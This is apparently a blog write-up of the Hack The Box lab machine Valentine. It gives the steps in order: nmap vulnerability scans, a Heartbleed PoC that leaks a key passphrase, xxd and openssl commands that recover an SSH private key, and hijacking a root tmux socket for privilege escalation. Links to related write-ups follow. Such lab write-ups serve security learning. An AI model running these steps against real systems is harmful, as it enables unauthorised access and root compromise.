HackTheBox

HTB Valentine: Heartbleed to Root via tmux Session Hijack

Onurcan Genç

03 Apr 2026 — 3 min read

Begin by adding the target machine IP to /etc/hosts.

nano /etc/hosts

sudo nmap -sV -sC valentine.htb

I also conducted an NSE script scan against the vulnerable target.

sudo nmap -sV --script=vuln valentine.htb --max-rate=10000

Meanwhile, directory fuzzing also proved useful.

dirsearch -u http://valentine.htb -w /usr/share/dirb/wordlists/common.txt

Let's check the /dev/ endpoint.

The directory contains two files, so I checked them.

In the notes.txt file, the author mentions a mechanism related to a key:

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Since the vulnerability is related to a key, and the Nmap results point to a Heartbleed-related vulnerability — as the default page also implies — I looked into the Heartbleed exploit.

I discovered a GitHub repo containing the related vulnerability PoC.

HeartBleed Exploit

Using the exploit as follows:

python2 heartbleed-poc.py 10.129.232.136 80

I was not able to run it via python3, so it most likely only works with Python 2.

The heartbeat response revealed a Base64-encoded string referencing decode.php.

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

CyberChef automatically decoded the text.

I could not identify the format, so I passed it through DenCode.

DenCode

Now it is clear that the hexadecimal encoding reveals an SSH private key, but it still did not work directly.

Decoding HEX

Therefore, I used the following techniques to extract the SSH key.

DECODE HEX

xxd -p -r encoded_data.txt out.txt

# MAKE THE key CLEAR

openssl rsa -in out.txt -out clean_key

Then I used the extracted key to authenticate via SSH.

ssh -i clean_key [email protected]

Initially, I could not find a privilege escalation vector. I transferred linpeas.sh to the target to enumerate further.

In the linpeas.sh results, a tmux session was found running as root:

/usr/bin/tmux -S /.devs/dev_sess

Running the binary directly with the -S flag attaches to the root session.

HTB Curling: Joomla RCE to Curl Config File Abuse

Begin with binding machine IP to custom domain. Conduct port scanning sudo nmap -sV -sC curling.htb Let's check Joomla: There were nothing valuable in this page. I also conducted a port scan with --script=vuln NSE engine. sudo nmap -sV --script=vuln --max-rate=10000 curling.htb It

CVE-2026-34156: VM Sandbox Escape to RCE in NocoBase

I discovered a critical vulnerability (CVSS3.1 10.0) in NocoBase's Workflow Script Node that allows an authenticated attacker to escape the Node.js vm sandbox and achieve Remote Code Execution as root with a single HTTP request. * CVE: CVE-2026-34156 * Advisory: GHSA-px3p-vgh9-m57c * Severity: Critical: CVSS:3.1 10.

HTB Beep: LFI to Root via Nmap Binary Exploitation

Bind machine IP to domain. Conduct port scan: sudo nmap -sV -sC beep.htb sudo nmap -sV -p- --max-rate 10000 beep.htb Including Login Page and sounds interesting, I could not connect through port 80 or 443, but nmap highlights HTTPS. Changing TLS version support worked in my browser. In

Applying Ethical Theories in Responsible Disclosure Program

“CTIS363 case study for responsible disclosure, institutional accountability, professional moral rules examined through five ethical norms.” Introduction Responsible disclosures as its innate structure clarifies “A great ethics” “A Full Moral Activity”. However, frequently, it sits at one of the most uncomfortable intersections in information security. Whether it is a good

Read more

HTB Curling: Joomla RCE to Curl Config File Abuse

CVE-2026-34156: VM Sandbox Escape to RCE in NocoBase

HTB Beep: LFI to Root via Nmap Binary Exploitation

Applying Ethical Theories in Responsible Disclosure Program